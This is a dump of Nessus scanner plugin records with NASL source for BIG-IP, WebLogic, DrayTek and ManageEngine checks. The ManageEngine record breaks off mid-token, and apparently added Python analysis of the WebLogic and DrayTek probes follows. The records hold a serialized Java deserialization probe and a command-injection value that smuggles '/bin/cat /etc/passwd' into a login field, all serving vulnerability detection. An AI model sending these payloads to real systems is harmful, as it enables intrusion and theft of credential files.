AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.1\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"10.1.0-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = 
make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\",\"10.1.0-10.2.4\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\",\"10.1.0-10.2.4\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.3.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"10.1.0-10.2.4\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"10.1.0-10.2.4\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"10.1.0-10.2.4\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T14:55:08", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WLS Security component due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. 
An unauthenticated, remote attacker can exploit this to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-23T00:00:00", "type": "nessus", "title": "Oracle WebLogic Java Object Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_2015_4852.NASL", "href": "https://www.tenable.com/plugins/nessus/87011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87011);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-4852\");\n script_bugtraq_id(77539);\n script_xref(name:\"CERT\", value:\"576313\");\n script_xref(name:\"IAVA\", value:\"2015-A-0287\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle WebLogic Java Object Deserialization RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WLS Security component due to unsafe\ndeserialize calls of unauthenticated Java objects to the Apache\nCommons Collections (ACC) library. 
An unauthenticated, remote attacker\ncan exploit this to execute arbitrary Java code in the context of the\nWebLogic server.\");\n # https://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e0203be3\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the vendor\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-4852\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - Raw Object');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\", \"t3_detect.nasl\");\n script_require_ports(\"Services/t3\", 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"t3.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nport = get_service(svc:'t3', default:7001, exit_on_fail:TRUE);\n\n# Try to talk T3 to the server\nsock = open_sock_tcp(port);\nif (!sock) audit(AUDIT_SOCK_FAIL, port);\nversion = t3_connect(sock:sock, port:port);\n\n# send ident so we can move on to login\nt3_send_ident_request(sock:sock, port:port);\n\n# send our \"login request\"\nauth_request = 
'\\x05\\x65\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1b\\x00\\x00\\x00\\x5d\\x01\\x01\\x00\\x73\\x72\\x01\\x78\\x70\\x73\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x75\\x72\\x03\\x78\\x70\\x00\\x00\\x00\\x00\\x78\\x74\\x00\\x08\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x75\\x72\\x04\\x78\\x70\\x00\\x00\\x00\\x0c\\x9c\\x97\\x9a\\x9a\\x8c\\x9a\\x9b\\xcf\\xcf\\x9b\\x93\\x9a\\x74\\x00\\x08\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x56\\x65\\x63\\x74\\x6f\\x72\\xd9\\x97\\x7d\\x5b\\x80\\x3b\\xaf\\x01\\x03\\x00\\x03\\x49\\x00\\x11\\x63\\x61\\x70\\x61\\x63\\x69\\x74\\x79\\x49\\x6e\\x63\\x72\\x65\\x6d\\x65\\x6e\\x74\\x49\\x00\\x0c\\x65\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x43\\x6f\\x75\\x6e\\x74\\x5b\\x00\\x0b\\x65\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x44\\x61\\x74\\x61\\x74\\x00\\x13\\x5b\\x4c\\x6
a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00';\n# this is an org.apache.commons.collections.functors.ConstantTransforms object\n# that is part of the deserialization blacklist.\nauth_request += '\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01';\nauth_request += 
'\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x25\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x49\\x6d\\x6d\\x75\\x74\\x61\\x62\\x6c\\x65\\x53\\x65\\x72\\x76\\x69\\x63\\x65\\x43\\x6f\\x6e\\x74\\x65\\x78\\x74\\xdd\\xcb\\xa8\\x70\\x63\\x86\\xf0\\xba\\x0c\\x00\\x00\\x78\\x72\\x00\\x29\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6d\\x69\\x2e\\x70\\x72\\x6f\\x76\\x69\\x64\\x65\\x72\\x2e\\x42\\x61\\x73\\x69\\x63\\x53\\x65\\x72\\x76\\x69\\x63\\x65\\x43\\x6f\\x6e\\x74\\x65\\x78\\x74\\xe4\\x63\\x22\\x36\\xc5\\xd4\\xa7\\x1e\\x0c\\x00\\x00\\x78\\x70\\x77\\x02\\x06\\x00\\x73\\x72\\x00\\x26\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6d\\x69\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x4d\\x65\\x74\\x68\\x6f\\x64\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x6f\\x72\\x12\\x48\\x5a\\x82\\x8a\\xf7\\xf6\\x7b\\x0c\\x00\\x00\\x78\\x70\\x77\\x34\\x00\\x2eauthenticate\\x28\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x73\\x65\\x63\\x75\\x72\\x69\\x74\\x79\\x2e\\x61\\x63\\x6c\\x2eUserInfo\\x3b\\x29\\x00\\x00\\x00\\x1b\\x78\\x78\\xfe\\x00\\xff';\nsend_t3(sock:sock, data:auth_request);\n\n# read in the response to our bad login request\nreturn_val = recv_t3(sock:sock);\nclose(sock);\n\nif (isnull(return_val) ||\n \"org.apache.commons.collections.functors.ConstantTransformer cannot be cast to\" >!< return_val)\n audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T17:22:59", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WLS Security component due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. 
An unauthenticated, remote attacker can exploit this to execute arbitrary code on the target host.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2015-12-04T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Java Object Deserialization RCE (Local Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2022-08-03T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CVE_2015_4852.NBIN", "href": "https://www.tenable.com/plugins/nessus/87209", "sourceData": "Binary data oracle_weblogic_server_cve_2015_4852.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-02T19:08:25", "description": "Nessus was able to exploit an unauthenticated remote command execution vulnerability on the web administration UI on the remote router and was able to retrieve the contents of /etc/passwd.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-10-22T00:00:00", "type": "nessus", "title": "DrayTek Vigor < 1.5.1 Unauthenticated RCE (Direct Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8515"], "modified": "2022-01-21T00:00:00", "cpe": ["x-cpe:/h:draytek:vigor"], "id": "DRAYTEK_VIGOR_UNAUTH_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/141781", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141781);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\"CVE-2020-8515\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"DrayTek Vigor < 1.5.1 Unauthenticated RCE (Direct Check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote router is affected by an unauthenticated remote command execution vulnerability.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to exploit an unauthenticated remote command execution vulnerability\non the web administration UI on the remote router and was able to retrieve the contents\nof /etc/passwd.\");\n # https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56fb076c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.5.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-8515\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/h:draytek:vigor\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"draytek_vigor_detect.nbin\");\n script_require_keys(\"Host/DrayTek/Vigor\");\n\n exit(0);\n}\n\ninclude('http.inc');\n\nif (!get_kb_item('Host/DrayTek/Vigor')) audit(AUDIT_HOST_NOT, 'DrayTek Vigor');\nmodel = get_kb_item_or_exit('Host/DrayTek/Vigor/model');\n\nif(model !~ \"^[Vv]igor(300[Bb]|2960|3900)\")\n audit(AUDIT_HOST_NOT, 'affected');\n\nport = get_http_port(default:443, embedded:TRUE);\n\nparams = 'action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a';\n\nres = http_send_recv3(\n item : '/cgi-bin/mainfunction.cgi',\n method : 'POST',\n port : port,\n follow_redirect : 1,\n content_type : 'application/x-www-form-urlencoded',\n exit_on_fail : TRUE,\n data : params\n);\n\nif(egrep(string:res[2], pattern:\"root:.*:0:[01]:\"))\n{\n # keep only the command output that precedes the page's own HTML\n contents = res[2] - strstr(res[2], \"<br />\");\n\n if (isnull(contents)) security_report_v4(port:port, severity:SECURITY_HOLE);\n else\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n report = '\\n';\n report += 'Here are the duplicated contents of the file \"/etc/passwd\" that\\n';\n report += 'Nessus was able to read from the remote host :\\n\\n';\n report += contents;\n \n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n }\n exit(0);\n}\nelse\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T14:54:00", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479. 
It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-19T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "href": "https://www.tenable.com/plugins/nessus/134677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134677);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-10189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.\");\n # https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b517c025\");\n # https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9944baef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central version 10 build 100479 or\nlater. 
Alternatively, apply the manual, vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-10189\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribu
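The WebLogic CVE-2015-4852 check above is a safe probe rather than an exploit: it sends a serialized org.apache.commons.collections.functors.ConstantTransformer inside a T3 authentication message and treats a "cannot be cast to" error in the reply as proof that the server resolved and instantiated the class before any deny list could stop it. The following Python is an added example, not Tenable's plugin code and not part of the original page. It rebuilds that probe object byte-for-byte from the serialVersionUIDs shown in the payload, extracts the class names from a Java serialization stream the way a T3-aware filter would pre-screen a message before readObject(), and applies both the deny-list decision and the plugin's reply test. The deny list is an assumption for illustration, not Oracle's actual WebLogic blacklist, and the class-name scanner is a linear marker scan rather than a full ObjectInputStream grammar walk.

```python
import re
import struct

# Markers from java.io.ObjectStreamConstants
STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_NULL, TC_CLASSDESC, TC_OBJECT, TC_STRING, TC_ENDBLOCKDATA = 0x70, 0x72, 0x73, 0x74, 0x78
SC_SERIALIZABLE = 0x02

# A Java fully-qualified class name: dotted identifiers, no slashes or spaces.
CLASS_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

# Illustrative deny list (an assumption for this example, not Oracle's list):
# the functors package is where the Apache Commons Collections gadget classes live.
DENY_PREFIXES = ("org.apache.commons.collections.functors.",
                 "org.apache.commons.collections4.functors.")


def utf(s: str) -> bytes:
    """Length-prefixed string as written by DataOutput.writeUTF (u2 length + bytes)."""
    b = s.encode("utf-8")
    return struct.pack(">H", len(b)) + b


def class_desc(name: str, suid: bytes, fields: bytes, nfields: int) -> bytes:
    """TC_CLASSDESC: className, serialVersionUID, flags, field count, field descriptors."""
    return (bytes([TC_CLASSDESC]) + utf(name) + suid + bytes([SC_SERIALIZABLE])
            + struct.pack(">H", nfields) + fields)


def integer_object(value: int) -> bytes:
    """A serialized java.lang.Integer; its superclass java.lang.Number has no fields."""
    integer_desc = class_desc("java.lang.Integer", b"\x12\xe2\xa0\xa4\xf7\x81\x87\x38",
                              b"I" + utf("value"), 1)
    number_desc = class_desc("java.lang.Number", b"\x86\xac\x95\x1d\x0b\x94\xe0\x8b", b"", 0)
    return (bytes([TC_OBJECT]) + integer_desc + bytes([TC_ENDBLOCKDATA])
            + number_desc + bytes([TC_ENDBLOCKDATA, TC_NULL])
            + struct.pack(">i", value))                       # Integer.value


def build_constant_transformer_probe() -> bytes:
    """Serialized ConstantTransformer(Integer(1)): the object the plugin embeds in
    auth_request, with the serialVersionUIDs copied from that payload."""
    ct_desc = class_desc("org.apache.commons.collections.functors.ConstantTransformer",
                         b"\x58\x76\x90\x11\x41\x02\xb1\x94",
                         b"L" + utf("iConstant") + bytes([TC_STRING]) + utf("Ljava/lang/Object;"), 1)
    return (STREAM_MAGIC + bytes([TC_OBJECT]) + ct_desc
            + bytes([TC_ENDBLOCKDATA, TC_NULL])   # end of descriptor, no superclass
            + integer_object(1))                   # value of the iConstant field


def class_descriptors(stream: bytes, max_name: int = 512) -> list:
    """Class names of every TC_CLASSDESC record found by scanning the stream.

    A descriptor is marker byte, u2 length, class name, 8-byte serialVersionUID
    and a flags byte, so a candidate is accepted only if a plausible length,
    a well-formed name and those trailing 9 bytes are all present.
    """
    if not stream.startswith(STREAM_MAGIC):
        raise ValueError("not a Java serialization stream (bad STREAM_MAGIC)")
    found = []
    i = len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            n = struct.unpack(">H", stream[i + 1:i + 3])[0]
            name = stream[i + 3:i + 3 + n]
            if (0 < n <= max_name and len(name) == n
                    and i + 3 + n + 9 <= len(stream) and CLASS_NAME.match(name)):
                found.append(name.decode("ascii"))
                i += 3 + n
                continue
        i += 1
    return found


def blocked_classes(stream: bytes) -> list:
    """Class names in the stream that a deny-list filter should refuse to resolve."""
    return [c for c in class_descriptors(stream) if c.startswith(DENY_PREFIXES)]


def response_indicates_vulnerable(t3_reply: bytes) -> bool:
    """The plugin's verdict: a ClassCastException naming ConstantTransformer means
    the class was deserialized; any other reply (or none) is treated as not vulnerable."""
    return (b"org.apache.commons.collections.functors.ConstantTransformer "
            b"cannot be cast to") in t3_reply
```

The deny-list check runs on the raw bytes before any object is constructed, which is the property the vulnerable servers lacked: by the time the cast in the error message fails, ConstantTransformer has already been instantiated.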
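The DrayTek CVE-2020-8515 check above logs in to /cgi-bin/mainfunction.cgi with a keyPath value that closes a shell quote, injects a newline-separated command, and re-opens the quote, then looks for an /etc/passwd root row in the reply. The following Python is an added example, not Tenable's plugin and not part of the original page. It decodes such a login body the way the router's CGI would, flags and extracts the command smuggled through keyPath (what a WAF rule or a proxy-log review would key on), and applies the plugin's success test to a response while blanking password hashes before anything reaches a report. The sample request bodies and the sample response are constructed for this example; the hash redaction is modelled on what the plugin's redact_etc_passwd call is for, not copied from it.

```python
import re
from urllib.parse import parse_qs

LOGIN_PATH = "/cgi-bin/mainfunction.cgi"

# Constructed copy of the plugin's probe body. ${IFS} is sent literally so the
# shell expands it to a space even where spaces are filtered.
PROBE_BODY = ("action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27"
              "&loginUser=a&loginPwd=a")

# A legitimate-looking login for comparison (constructed).
BENIGN_BODY = "action=login&keyPath=&loginUser=admin&loginPwd=s3cret"

# Constructed reply from a vulnerable router: the command output is echoed
# ahead of the page's own HTML.
SAMPLE_RESPONSE = (
    "root:$1$abcdefgh$0123456789abcdefghijkl:0:0:root:/root:/bin/sh\n"
    "admin:x:500:500::/home/admin:/bin/sh\n"
    "<br />\n<html><body>login failed</body></html>"
)

# Characters that have no place in a key path but every place in a shell line.
SHELL_META = re.compile("[\n\r;|&`$'\"(){}]")

PASSWD_ROW = re.compile(r"root:.*:0:[01]:")   # the plugin's egrep pattern


def decode_login(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded login body to single values."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def injected_commands(body: str) -> list:
    """Shell lines smuggled through keyPath, with ${IFS} expanded; [] if clean.

    The injection shape is quote-close, newline, command, newline, quote-reopen,
    so splitting on newlines and dropping the bare quote fragments leaves the
    attacker's command(s).
    """
    key_path = decode_login(body).get("keyPath", "")
    if not SHELL_META.search(key_path):
        return []
    return [line.replace("${IFS}", " ")
            for line in key_path.splitlines()
            if line.strip("'\" ")]


def passwd_leaked(response_body: str):
    """The plugin's verdict on the HTTP reply.

    Returns None when no root row is present; otherwise the leaked passwd
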